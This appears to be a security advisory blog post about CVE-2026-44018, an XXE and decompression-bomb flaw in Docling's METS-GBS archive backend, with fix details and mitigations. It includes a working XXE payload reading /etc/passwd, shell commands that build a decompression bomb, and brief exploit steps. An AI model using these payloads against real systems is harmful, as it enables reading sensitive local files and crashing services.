Docling, Unsafe Archive Extraction and XML Parsing, CVE-2026-44018 (Moderate) -DC-Jun2026-205

Listen to this Post

Intro

CVE-2026-44018 affects Docling’s METS-GBS backend. The vulnerability arises from insecure XML parsing and insufficiently controlled archive extraction. When processing a METS-GBS `.tar.gz` archive, the backend uses `lxml.etree.fromstring()` without disabling entity resolution or DTD loading. This allows an attacker to embed an XML External Entity (XXE) that can read arbitrary local files or trigger a denial of service through entity expansion.
Additionally, the backend does not impose resource limits on decompression. A malicious archive can contain a decompression bomb (e.g., a small `.tar.gz` that expands to terabytes of data), exhausting memory and disk space. The extraction process also lacks limits on the number of files or total extracted size, making unbounded archive extraction possible – a crafted archive can contain thousands of files that consume all available inodes or fill storage.
To exploit the XXE, an attacker includes a `DOCTYPE` declaration in the METS XML file:

<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<mets:root>
<data>&xxe;</data>
</mets:root>

When `etree.fromstring()` parses this XML, the `&xxe;` entity is resolved, and the contents of `/etc/passwd` are read and processed. For a decompression bomb, the attacker creates a small `tar.gz` containing a single `10GB` file of zeros; extracting it allocates 10 GB of disk and memory, causing resource exhaustion.
The lack of validation for the number of archive members allows an archive with 100,000 small files to be extracted, potentially leading to inode exhaustion or performance degradation. Together, these issues can lead to information disclosure, application crashes, or full system denial of service.
The vulnerability exists in all Docling versions prior to 2.91.0. The fix, released in version 2.91.0, introduces secure XML parser settings, configurable extraction limits, and cumulative size tracking.

DailyCVE Form

Platform: Docling backend
Version: < 2.91.0
Vulnerability: XXE, decompression bomb
Severity: Moderate
Date: 2026-06-02

Prediction: Patch already released

What Undercode Say: Analytics

Check Docling version
pip show docling | grep Version
Exploit simulation: Create malicious XXE XML
echo '<!DOCTYPE test [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>' > evil.xml
Simulate decompression bomb (creates 1GB file)
dd if=/dev/zero of=bomb.data bs=1M count=1024
tar -czf bomb.tar.gz bomb.data
Monitor extraction impact
while true; do df -h; sleep 1; done

Exploit

1. XXE File Read

Place the malicious XML inside the METS-GBS archive. When processed, the backend resolves the entity and returns the file content.

2. Decompression Bomb

Craft a small `.tar.gz` that expands to a massive file. The backend attempts to extract it, consuming disk/memory until limits are hit or the system crashes.

3. Unbounded Extraction

Create an archive with thousands of tiny files. The backend extracts all members, possibly exhausting inodes or CPU time.

Protection

  • Upgrade to Docling ≥ 2.91.0 – the official fix includes:
  • resolve_entities=False, load_dtd=False, `no_network=True` in XML parser
  • Limits: 300 MB total extraction, 10 MB per file, max 1000 members
  • Cumulative size tracking and early termination when limits are exceeded
  • Workaround – Avoid processing untrusted METS-GBS archives; if necessary, pre‑validate them in an isolated environment with resource limits.

Impact

  • Information disclosure – Attacker can read any file accessible to the backend process.
  • Denial of service – Entity expansion or decompression bombs exhaust CPU, memory, or disk space, crashing the application or host.
  • Resource exhaustion – Unbounded archive extraction can fill storage or inodes, making the system unusable.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top